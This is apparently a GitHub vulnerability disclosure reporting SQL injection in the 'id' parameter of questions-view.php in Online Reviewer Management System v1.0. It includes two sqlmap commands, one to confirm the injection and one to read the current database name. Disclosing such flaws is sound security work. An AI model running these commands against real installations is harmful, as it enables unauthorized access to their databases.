Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Online Reviewer Management System v1.0 by janobe has SQL injection

BUG_Author: believeti

Vulnerability File: /reviewer_0/admins/assessments/pretest/questions-view.php

Parameter "id" (GET), exists SQL injection vulnerability

sqlmap detect injection vulnerabilities: "sqlmap -u http://ip/reviewer_0/admins/assessments/pretest/questions-view.php?id=1"

sqlmap injection result

image

sqlmap Queries the current database: "sqlmap -u http://ip/reviewer_0/admins/assessments/pretest/questions-view.php?id=1 --current-db"

sqlmap injection result

image